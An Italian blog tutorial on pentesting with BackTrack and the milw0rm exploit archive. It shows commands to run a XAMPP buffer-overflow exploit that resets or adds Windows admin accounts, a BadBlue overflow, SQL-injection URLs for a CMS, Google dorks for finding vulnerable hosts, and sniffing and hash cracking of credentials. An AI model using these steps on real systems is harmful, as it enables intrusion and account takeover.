BackTrack & Milw0rm Exploits Archive [+video]

milw0rm_cracker.jpg

***

Ciao a tutti,

eccoci arrivati a fare un altro dei nostri test che , personalmente , reputo tra i più interessanti.

Il tutorial che state per leggere comprende un pentesting , quello che andremo a fare in pratica è: come utilizzare la nostra BackTrack per fare un pentesting tramite l’ uso dell’ archivio degli exploits di milw0rm.com.

Per eseguire il nostro pentesting ci serviremo di:

  • L’ Archivio degli Exploits di Milw0rm.
  • nMap , per la scansione con opzioni per il fingerprinting.
  • Dsniff , esclusivamente per lo sniffing delle credenziali da localhost.

***

Ci tengo a dire che in questo tutorial non è stato fatto danno ad alcuno , tutti si svolge nella mia LAN . Ho provato a chiedere l’ autorizzazione a vari sysadmin , ma dopo aver upgradado le loro cosette non mi hanno nemmeno risposto… ….0 su 9.

Altra cosa importrante che mi sento di aggiungere è di ringraziare: KaB0T per la disponibilità ed  EikaF , senza il quale avremmo fatto un altro video lento ed incasinato , anche se da questo punto di vista dobbiamo ancora migliorare credo che si veda la differenza “in meglio” nei confronti dei video precedenti.

***

tutto il tutorial è referente interamente al video che abbiamo fatto , dal nome

“BackTrack & Milw0rm Exploits Archive” , naturalmente presente nella pagina /video.

è stato girato interamente con Fluxbox , ma le sezioni che io uso per Fluxbox sono identiche a quelle impostate di default in BackTrack per KDE , quindi non cambia nulla…

…Il video è scaricabile da Quì.

***

Innanzitutto voglio fare delle piccole precisazioni:

Il pc nella mia LAN ha un multiboot con: WinServer-2003.spk2-(FamilyConnection-CMS)- , WinServer-2000.spk3-(-XAMPP)- , Windows Xp spk2-(BadBlue-WebServerFileSharing)-.

Sono stati usati in tutto 3 exploits , per altrettante demo nel video.

Uno degli exploits è un exploit scritto da rGod e diretto verso uno Xampp… , (-nel video ultima demo-) , …cos’é uno Xampp?

lo Xampp è un “aggregato” di webserver e database , con tanto di interprete PHP , in pratica con lo xampp ho instalato sul sistema , poi preso come “vittima” , il webserver Apache , il database MySql e l’interprete PHP , per saperne di più potete darvi una leggerissima letta alla nostra pagina /Inf0-[IT]

Un altro exploit , (-nel video seconda demo-) , (scritto dal CWH Underground Hacking Team) , invece è diretto contro un CMS , il FamilyConnection CMS , una piattaforma tipo WordPress , solo che viene usata molto fra community.

L’ altro exploit , (-nel video prima demo-) , (scritto da J.Cervini su un Bug scoperto da L.Auriemma) , è diretto invece verso un webserver , il BadBlue. Il BadBlue è un semplice webserver utilizzato per il filesharing tra conoscenti , installandosi sul proprio sistema il BadBlue si possono in pratica condividere files di tutti i tipi.

tutti questi exploits utilizzati sono naturalmente corrispondenti ad una specifica versione dei corrispettivi server , CMS , applicazioni eccetera…

***

Ma facciamo una breve descrizione di cio che stiamo per fare…

Il team di remote-exploit.org , ha pensato bene di inserie un tool da riga di comando che permetta a tutti gli user di BackTrack di avere a disposizione , (anche OFF-Line) , un archivio di exploits per effettuare , in ogni situazione , un pentesting con il massimo grado di efficacia e lo ha fatto inserendo in BackTrack l’ archivio exploits di Milw0rm.

Milw0rm è un sito che raccoglie centinaia di Exploit & Shellcodes , scritti in vari tipi di linguaggi di programmazione e per tutti i tipi di piattaforme ed applicazioni , web e non.

[installazione Archivio per la BackTrack3.final]

Fino alla versione 3.beta della BackTrack un archivio degli exploits di milw0rm era inserito da installazione , dalla 3.final no , ma basta installarselo tramite Fast-Track , (tool multifunzione di cui scriveremo a breve…), quindi:

KdeStartMenù –> BackTrack –> Penetration –> Fast-Track ,

dal menù principale di Fast-Track scegliete la modalità “interactive“:

bt~# ./fast-track.py -i

In questo modo otterrete un altro menù , scegliete l’ opzione 1 , quindi la 4 e vi si installerà l’ archivio milw0rm. con lo script per l’ UPdate.

***

Fast-Track Updates

Enter a number to update

1. Update Fast-Track
2. Metasploit 3 Update
3. Aircrack-NG Update
4. Milw0rm Update
5. Nikto Plugin Update
6. W3AF Update
7. SQLMap Update
8. Installation Menu
9. Update Everything
10. Return to Main Menu

Enter number:

***

Oltre a Milw0rm ci sono molti altri siti che raccolgono , ed hanno un proprio archivio di exploits e di shellcodes , ma visto che tratteremo l’ uso di un archivio già presente in BackTrack , ( o almeno installabile – per la 3.final ) , descriveremo ed effettueremo un pentesting con l’ archivio di Milw0rm.

È possibile trovare sul sito Milw0rm materiale quali:  documenti , videotutorial , withepaper , il password cracker , un dizionario , ed è possibile inoltre ottenere tramite download lo stesso archivio degli exploits.

Una piccola , ma molto comoda , utility che Milw0rm offre è l’ estensione per Firefox che abilita la ricerca sullo stesso sito , volendo l’ opzione è disponibile quì.

Milw0rm è un sito che , insieme ad altri quali , solo per fare un esempio , SecurityReasonSecurity Focus , Packet Storm , Vulnerability Assestament , Securiteam …eccetera , ottiene nuovi exploits in maniera abbastanza “lesta” , tutti gli amministratori di sistemi traggono importanti informazioni da milw0rm , personalmente non credo che chiunque voglia essere al passo con la scoperta di nuove vulnerabilità possa fare a meno di passare per un sito come Milw0rm.

Non posso però evitare di dire che non tutte le vulnerabilità vengono rilevate ; che non tutte quelle rilevate vengono rivelate e che non si può essere MAI certi al 100% di conoscere tutte le vulnerabilità , è una cosa impossibile , ma tenersi aggiornati periodicamente è una cosa fondamentale , farlo tramite un sito di exploit pubblici come quelli che vi ho appena elencato è sicuramente un ottimo inizio.

Gli exploit che non sono ancora stati rivelati , che prendono il nome di 0day , sono quelli che possono causare più problemi di tutti , visto che la loro effettiva funzione viene scoperta a danno già fatto.

Va detto comunque che ci sono anche 0day che vengono rivelati direttamente dai siti che vi ho citato sopra , ma questa è una cosa che dipende da coloro che li rendono pubblici.

Fatte queste dovute premesse credo sia giusto scrivere qualcosa anche a riguardo degli exploits , almeno per rendere l’ idea a tutti di quello che stiamo facendo.

Un exploit è un programma , script , che permette di sfruttare delle vulnerabilità insite in applicazioni , programmi di varia natura e funzione , database o anche una semplice pagina web e che ci permette di poter eseguire sul sistema preso come obbiettivo dell’ attacco , del codice “maligno” , dannoso , cosa che normalmente non è possibile fare. L’ exploit , inteso come programma , o script , può rappresentare anche una stringa unica , come ad esempio nel caso dell’ Sql-Injection , basta andare su Milw0rm per rendersene conto.

Un exploit può essere scritto in vari tipi di linguaggii di programmazione , dal C al python , dal Php al Perl e così via… …e molte volte necessitano di compilazione.

Di seguito elencherò alcuni tipi di attacco , ma lo farò seguendo il metodo che ci interessa in questo tutorial , quindi secondo la suddivisione dell’ archivio degli exploits di milw0rm in rete , sullo stesso sito milw0rm , oppure secondo l’ archivio in BackTrack.

[UPdate Milw0rm Archive]

Facciamo , come bisognerebbe fare ogni qualvolta si intende eseguire un test di penetrazione tramite degli exploits , un UPdate dell’ archivio degli Exploits di Milw0rm , andiamo quindi in:

KdeStart –> BackTrack –-> Penetration –-> Milw0rmExploitArchive-> “…” , e da quì selezioniamo:Update Milw0rm Archive, in questo modo ci si aprirà una shell che automaticamente effettuerà l’ UPdate , otteniamo così tutto l’ archivio aggiornato degli exploits da milw0rm.com.

[Ricerca exploits]

Gli exploits che abbiamo ottenuto tramite il nostro UPdate si trovano nella seguente directory:

/pentest/exploits/milw0rm/ “………”

Ora , appena terminata la procedura di UPdate , andiamo nella directory indicata sopra direttamente da Konsole , con xTerm oppure con Konqueror , da quì possiamo vedere che nella directory ~/Milw0rm/ sono contenute altre subdirectory , ognuna identifica una serie di exploits equivalenti a determinati tipi di piattaforme …platforms , o porte …rport.

Dalle subdirectory in ~/platforms/… windows , unix , solaris …eccetera si dividono poi in attacchi da remote o local.

***

Grazie ad una novità di ./str0ke , (admin di milw0rm.com) , che ha creato una lista di exploits appositamente per BackTrack , (dal nome appunto “sploitlist-bt.txt) , il metodo di ricerca per gli exploits che si trovano all’ interno dell’ archivio Milw0rm in BackTrack , si esegue tramite il comando grep , sempre da shell e naturalmente all’ interno della directory che contiene le liste di exploits in formato *.txt , una dal nome sploitlist.txt e l’ altro sploitlist-bt.txt

In questo modo , se ci serve ad esempio un exploit per il Vista , ci basterà dare il comando:

bt~# grep Vista sploitlist-bt.txt

e ci verranno restituite le subdirectory con gli exploits disponibili.

Per fare un semplice esempio , nel nostro caso , trattandosi per quanto riguarda il pentesting contro il sistema con Windows XP.professional , del webserver BadBlue andrò dapprima nella directory corretta e poi cercherò con il comando grep gli exploits disponibili , nel modo seguente:

bt ~# cd /pentest/exploits/milw0rm/

bt milw0rm # grep BadBlue sploitlist-bt.txt

..ed ecco il risultato ottenuto.

***

./platforms/windows/remote/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow
./platforms/windows/remote/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow
./platforms/windows/remote/4715.txt BadBlue <= 2.72b Multiple Remote Vulnerabilities
./platforms/windows/remote/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit
./rport/80/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow
./rport/80/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow
./rport/80/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit

***

[Attacco con Exploits]

Arrivati ai vari tipi di attacco facciamone , come è giusto , una brevissima descrizione fatta secondo le principali sigle su milw0rm , ovvero: DoS-PoC , Web-App , Shellcode , Local e Remote

[Attacco DoS e DDoS]:

La sigla DoS sta a significare Denial of Service , e la sigla DDos sta invece per Distribuite-Denial of Service.

Come dicono le stesse sigle , il successo di questo tipo di attacco sta nel diniego del servizio , distribuito nel secondo caso , (DDoS) , singolo nel primo.

Queste parole in stile “traduzione” , dovrebbero rendere già l’idea del significato di un attacco DoS oppure DDoS , il suo funzionamento sta nel far arrivare al sistema vittima un attacco , o un insieme di attacchi , che rendono inaccessibile il sistema ; ma come può avvenire ciò?

La risposta è facile: un sito , che si raggiunge con una connessione ad internet , può esserci negato quando ad esempio siamo senza banda , senza linea praticamente , e saturare la banda a disposizione del sistema potrebbe essere quindi già un metodo per effetuare un DoS. Un attacco alla banda di un sistema potrebbe avvenire ad esempio tramite un eccessivo numero di richieste di accesso , ed il sistema , se non preparato , non potrà che andare fuori uso.

È ancora oggi famoso ciò che accadde nel Febraio del 2000 , quando al sistema di Yahoo! venne sferrato un attacco di tipo DDoS , e rimase inaccessibile per delle ore. L’ attacco sferrato partì da centinaia di host in giro per la rete che a sua volta furono violati precedentemente.(…Tahnx! to OpenSkills)

Il sistema di attacco DoS non è compromettente , è facile capire che se viene effettuato un DoS tramite la saturazione di una banda , una volta che la stessa tornerà attiva i problemi svaniranno…. ….almeno fino al prossimo attacco (!?), ma non è comunque una cosa che compromette il sistema.

[La sigla PoC]:

La sigla PoC sta a significare “Proof of concept” , abbozzo o progetto da terminare , inserita con lo scopo di dimostrare la fondatezza di un determinato progetto. Negli elenchi degli exploits sul sito milw0rm.com , la sigla PoC viene riportata quando coloro che scoprono il bug e ne scrivono successivamente l’ exploit corrispondente , mostrano con delle spiegazioni l’ eseguibilità del loro lavoro.

breve esempio:

nell’ ultima demo del videotutorial si esegue un attacco verso uno Xampp , l’ exploit come già detto scritto da rGod , contiene commentata una serie di stringhe che ne spiegano l’ efficacia , questo il contenuto del PoC nell’ exploit ./3738.php di rGod

***

mssql_connect() function is vulnerable to buffer overflow and
the host argument is totally unchecked. Also this shows a vulnerabilty in
ADODB library (which is in the include path, inside PEAR folder) in the
Connect method .

If you say that this should be not used for production purpose or
exposed to the outside world, try theese google dorks:

intitle:XAMPP intitle:windows intitle:version
intitle:XAMPP intitle:version intitle:1.6.0a +windows

note: I could use the INTO OUTFILE method through sql injection
to export some shell inside the /htdocs folder because we have FILE
privilege, but we have  magic_quotes_gpc on here. This is instead
possbile through the PhpMyAdmin default user/password.
note ii: PHP version is 5.2.1
note iii: bof is possible because mssql extension is enabled
by default in php.ini
*/

***

[Attacco in local] :

L’ attacco in local è quell’ attacco che si svolge all’ interno di una rete indipendende , anche se non del tutto , o si ha già comunque un certo accesso alla rete stessa. Un esempio può essere quello di fare dello sniffing nella propria LAN oppure acquisire i privilegi di amministratore del sistema da utente semplice. Un esempio di sniffing può essere quello che ho descritto nell’ esempio fatto con Ettercap e che dimostra appunto come poter fare “sniffing” di username e password all’ interno di una LAN.

Gli attacchi in local sono però di varia natura , anche se la maggiorparte , vista la questione di permessi , sono effettuati su sistemi M$Windows , ce ne sono anche molti per sistemi UNIX-based , l’ exploit n° 5052 ,(quando parlo di numeri , mi rivolgo al numero occupato dall’ exploit all’ interno dell’ archivio milw0rm), infatti è proprio propenso al local root exploitation su sistemi GNU/Linux.

[Attacco in remoto]:

L’attacco in remoto è quella tipologia di attacco che si effettua da una postazione totalmente estranea all’ obbiettivo , che si trova quindi su di un altro dominio , e di cui non si ha nessun permesso d’ accesso.

È logico capire che ogni tipo di attacco può o no essere fine a se stesso , oppure può essere utilizzato in concomitanza con altre tipologie di attacco.

***

In questo caso ho elencato esclusivamente alcuni tipi di attacco , solo per rendere l’ idea , se si và sul sito milw0rm.com si possono trovare sigle del tipo RFI , LFI , Loca Root Exploits eccetera… , a tutte queste descrizioni sia giusto rimandarvi al portale informatico di Wikipedia.

***

Andiamo avanti con il tutorial , il primo pentesting , (terza demo nel video) ,  viene eseguito sullo Xampp , dalla directory esatta , come sopra eseguo da shell il comando:

bt milw0rm # grep XAMPP sploitlist-bt.txt

ed eccone il risultato:

./platforms/windows/remote/3738.php XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit

./platforms/windows/local/4325.php XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
./rport/80/3738.php XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit

***

L’ exploit che useremo è il 3738.php , e per essere eseguito basta dare un occhiata alla matrice stessa dell’ explot , basta dare da shell il comando come eseguibile preceduto dall’ interprete quindi:

php ./3738.php

il tutto naturalmente dopo essere entrati nelle directory elencate dal comando grep.

bt milw0rm # cd platforms/windows/remote/

Con il comando appena eseguito ci verrà elencata tutta la “matrice” dell’ exploit , chi l’ ha scritto , la piattaforma , il bug e in che modo deve essere eseguito , e infatti ecco il risultato…

***

bt remote # php ./3738.php

—————————————————————————
XAMPP for Windows <= 1.6.0a adodb.php/mssql_connect() remote buffer overflow
proof-of-concept exploit
seh overwrite method / 2000 sp3 version
mail: retrog at alice dot it
site: http://retrogod.altervista.org
—————————————————————————

—————————————————————————
Usage: php ./3738.php host cmd OPTIONS
host: target server (ip/hostname)
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-S only send the second packet
Example:
php ./3738.php localhost VER -P1.1.1.1:80
php ./3738.php localhost NET USER sun tzu /ADD ^&^& NET LOCALGROUP
Administrators /ADD sun -p81 -S
—————————————————————————

***

Come possiamo vedere dalla lista di informazioni che ci viene restituita all’ interno della nostra shell , l’ exploit per essere eseguito necessita di alcune informazioni. Ogni exploit per essere eseguito necessita di informazioni diverse , ci sono exploit compilati e da compilare , e tutti sono eseguibili con successo , naturalmente , solo se il sistema vittima è affetto dalla vulnerabilità che l’ exploit andrà ad usare lo Xampp deve essere alla versione <=1.6.0a , rigorosamente , come possiamo leggere dalla matrice stessa , per Windows.

Vediamo ora di eseguire l’ exploit con i dovuti comandi…

Un esempio che ci viene mostrato dall’ exploit è il seguente:

php ./3738.php localhost VER -P1.1.1.1:80

Noi , avendo un server su cui provarlo , daremo il seguente comando da konsole:

php ./3738.php 29.230.6.73 net user Administrator komintern

dove:. net user Administrator komintern è il comando che verrà eseguito sul server dopo il BoF , ovvero il cambio della password dalla precedente a komintern sul sistema del mio vicino di casa con il quale mi trovo nella stessa Lan…comando che per funzionare , questo va detto , mi ha costretto a modificare varie opzioni nel database e vari files di configurazione del PHP , php.ini eccetera.

Una volta cambiata la password dell’ Administrator , apro una sessione Telnet e mi connetto al Server con le credenziali create , per mostrarle ho fatto un semplicissimo sniffing con dsniff sulla mia stessa interfaccia di rete , con il comando:

bt remote # dsniff -i ath0

che naturalmente ha funzionato alla perfezione mostrandomi le credenziali di accesso al server ovvero:

—————–
06/30/08 21:32:12 tcp 29.230.6.74.42449 -> 29.230.6.73.23 (telnet)

KominternAdministrator
komintern

Aperta la sessione Telnet sono stato in grado di inetragire con tutto il sistema , la maggiorparte delle volte infatti se il servizio Telnet è abilitato , solo l’ Administrator può interagire con il Desktop del sistema , non si lascia interagire un utente “normale” o anche del gruppo Administrators… …ma questo di solito , poi ognuno configura la propria rete come vuole.

Il giallo sta a rappresentare un semplice errore di sniffing di dsniff , perchè volendo copiare la parola komintern senza doverla digitare in seguito , e come potete vedere dal video lo username è stato unicamente Administrator , provando a dare meglio l’ idea dsniff ha raccolto le credenziali in modo totale , senza che poi il login abbia o no avuto successo.

È ovvio che ho preso il caso dello xampp perché volevo realizzarci un video e fare una piccola dimostrazione , ma se ci saremmo dovuti occupare di fare pentesting su di un server esterno le cose non sarebbero cambiate di molto , ad ogni versione di MySQL , di PHP di CMS eccetera , corrispondono delle vulnerabilità e degli exploits , e con l’ archivio di Milw0rm nella nostra BackTrack , abbiamo la possibilità di effettuare tutti i test che vogliamo. La maggiorparte delle volte che si sente parlare di siti che pubblicano exploits in “malomodo” , succede per il semplice fatto che chi fa danni , al 99% dei casi non va a scegliersi un obbiettivo da attaccare , che sarebbe a mio modo di vedere la cosa , sempre male ma che dimostra capacità , ma lo fà andando in giro per dork , ovvero trovare in google tutti i siti vulnerabili per poi prendere il primo che capita e fare il danno… …cosa che , a quanto pare , rende più famosi , ma molto semplice ed inutile.

***

Andiamo adesso ad effettuare il nostro pentesting contro un sistema che ha come OS WindowsXpPro , nel video la prima demo.

facciamo una scansione delle porte tramite nMap , e vediamone il risultato…

***

bt ~ # nmap -sS -sV -T Aggressive 29.230.6.73 -v

Starting Nmap 4.50 ( http://insecure.org ) at 2008-05-16 11:18 GMT
Initiating ARP Ping Scan at 11:18
Scanning 29.230.6.73 [1 port]
Completed ARP Ping Scan at 11:18, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:18
Completed Parallel DNS resolution of 1 host. at 11:18, 0.05s elapsed
Initiating SYN Stealth Scan at 11:18
Scanning 29.230.6.73 [1711 ports]
Discovered open port 81/tcp on 29.230.6.73
Discovered open port 139/tcp on 29.230.6.73
Discovered open port 912/tcp on 29.230.6.73
Discovered open port 445/tcp on 29.230.6.73
Discovered open port 135/tcp on 29.230.6.73
Discovered open port 4662/tcp on 29.230.6.73
Completed SYN Stealth Scan at 11:19, 7.24s elapsed (1711 total ports)
Initiating Service scan at 11:19
Scanning 6 services on 29.230.6.73
Completed Service scan at 11:19, 11.07s elapsed (6 services on 1 host)
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 11:19
Completed SCRIPT ENGINE at 11:19, 0.21s elapsed
Host 29.230.6.73 appears to be up … good.
Interesting ports on 29.230.6.73:
Not shown: 1705 filtered ports
PORT STATE SERVICE VERSION
81/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
912/tcp open ftp vsftpd or WU-FTPD
4662/tcp open edonkey?
MAC Address: 00:13:8F:EB:1D:DD (Asiarock Incorporation)
Service Info: OS: Windows

Host script results:
|_ Discover OS Version over NetBIOS and SMB: Windows XP

Read data files from: /usr/local/share/nmap
Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.845 seconds
Raw packets sent: 3417 (150.346KB) | Rcvd: 7 (318B)

***

bene , come possiamo vedere sul sistema “vittima” ci sono , oltre a delle porte aperte che potrebbero essere sfruttate in altro modo , delle informazioni che possono esserci molto preziose , infatti dalle ultime righe possiamo benissimo leggere:

***

PORT STATE SERVICE VERSION
81/tcp open http BadBlue httpd 2.7

***

Sulla porta 80 quindi c’é in esecuzione il BadBlue , alla versione 2.7.

Il BadBlue è un webserver che permette di poter condividere , pubblicamente o no , tutti i files , documenti , foto eccetera.

Il BadBlue a questa versione , che nMap ci ha restituito , contiene però una vulnerabilità che è molto grave come falla e ci permette di penetrare il sistema e dopo aver causato un BufferOverFlow ci permette anche di ottenere una reverse shell , i comandi , shellcode compreso , sono già tutti contenuti all’ interno dell’ exploit.

potete vedere benissimo dal video che non solo sono penetrato , grazie all’ exploit , all’ interno del sistema , ma ho anche cambiato la password dell’ amministratore del sistema stesso con il seguente comando:

net user KaB0T brigante

C:\> net user KaB0T brigante

(KaB0T è il nome di un mio vicino di casa con il quale mi condivido spesso la connessione…)

Il terzo ed ultimo esempio di pentesting , nel video seconda demo , con exploits targati milw0rm l’ ho fatto con una semplicissima SQL-Injection… …semplicissima per chi la usa , come nel nostro caso , ma per realizzare l’ exploit non è così semplice.

La SQL-Injection che ho usato per questo test va a colpire una vulnerabilità insita nel CMS-Family Connection , alla versione 1.4.

sempre con la stessa procedura , mi sono spostato nella directory giusta…

bt ~ # cd /pentest/exploits/milw0rm/

ed ho raccolto i possibili risultati dall’ archivio con il comando grep:

bt milw0rm # grep Family sploitlist-bt.txt

e questo è stato il risultato:

./platforms/php/remote/892.txt phpMyFamily <= 1.4.0 Admin Bypass SQL Injection
./platforms/php/remote/1208.pl phpMyFamily <= 1.4.0 SQL Injection Exploit
./platforms/php/remote/5811.txt Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerability

***

Ottenuto il risultato per il FamilyConnection-CMS cui mi trovavo davanti , sono andato nella directory giusta:

bt milw0rm # cd platforms/php/remote/

dopodiché essendo un file *.txt potevo aprirlo come volevo , con nano , vim , kate , visto che non finisce in shell come i precedenti due esempi l’ ho aperto con lo Scintilla… …lo SciTE , editor adattabile a molti linguaggi di progrmmaione compreso in BackTrack di prima installazione , quindi:

bt remote # SciTE 5811.txt

aperto il file *.txt ho letto le seguenti indicazioni:

***

First you must register for access to user section then SQL Injection Exploit !!!

———-
Exploits
———-
[+] /addressbook.php?address=<SQL Injection>
[+] /familynews.php?getnews=<SQL Injection>&newsid=2
[+] /home.php?action=results&poll_id=<SQL Injection>

***

dopodiché ho eseguito l’ Injection ed ho ottenuto le credenziali di accesso dell’ amministratore del sito , ovvero:

***

admin : 6970ff8bb08f3c1bde2f49c608ac4b21

***

Una volta preso l hash dell’ admin , vado direttamente sul sito di milw0rm.com sul link cracker e inserisco l hash selezionando naturalmente come opzione di criptatura md5 , aspetto non molto , visto che già l’ avevo fatta prima l’ operazione e ottengo la password con la quale in seguito effettuo l’ accesso al CMS come amministratore.

Naturalmente avrei potuto fare anche una prova con John The Ripper o altre soluzioni OFF-Line inserite in BackTrack , ma parlando dell’ archivio degli exploits di milw0rm.com ho ritenuto migliore soluzione lavorare con lo stesso cracker di milw0rm , oltretutto in questo modo si contribuisce ad aggiungere un altro hash crackato , sperando sempre che non finisca nelle mani sbagliate.

Questa è solo una semplicissima dimostrazione di come è possibile fare pentesting con estrema facilità e nel minor tempo possibile , del resto da un’ accoppiata come Milw0rm & BackTrack ci si può aspettare solo il top.

Spero di essere stato abbastanza chiaro , per ogni cosa nella pagina /video c’é il videotutorial di questo How-To… per ogni chiarimento siamo in canale e in mailinglist.

I commenti quì nel blog cortesemente , usateli come comnmenti , non come help-desk.

Ciao a tutti e alla prossima.

8 commenti

  1. Brigante…. come sempre ottimo lavoro!

    Come sempre… se hai bisogno di una mano fischia pure!

    See u dude! 8)

  2. […] completo da […]

  3. Non ho controllato prima ma sulla mia BT3 su usb key dopo aver aggiornato fast-track in quella subdir del menù K trovo solo un collegamento web al sito milw0rm.com. Ok da lì posso scaricarmi l’archivio, grazie tante, ma non capisco perchè hanno rimosso forse ha a che vedere con il sito stesso? O sono solo io che ha questo problema?

  4. scaricatevi il fils update milw0rm dal Box sharing e mettetelo nella vostra directory /pentest/exploits/milw0rm…

    fatto questo dovrebbe essere tutto ok.

    brigante comunque l’ ha detto che se avete bisogno dovete andare in chan e non domandare quì.

    ciauuuzzzz.
    🙂

  5. il file e nella cartella programm backtrack del box e la cartella milw0rm viene creata scompattando l archivio tar.bz2

  6. una volta fatta l’ operazione se volete potete fare l update con:

    sh update-milw0rm.sh

    ciauz!

    8)

  7. Salve a tutti avrei un problema con Fast-Track. Quando vado ad aggiornare mi dice udpate-milw0rm.sh not found. Il file l’ho messo lo stesso in /pentest/exploits/milw0rm. come faccio ad aggiornare milworm con FastTrack? Grazie.

  8. l’ ho detto più volte , l’ ho scritto in un articolo , se volete scrivere sul blog tra voi siete liberi di farlo , ma non fate domande perché non vi verrà data risposta da noi del blog.

    non possiamo più farlo ormai da 3 mesi quindi:

    chi ha bisogno di aiuto provi ad entrare in chan…

    https://carlitobrigante.wordpress.com/2008/01/04/il-chan-del-backtrackblog/

    ciao a tutti e buonagiornata…


Comments RSS TrackBack Identifier URI

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...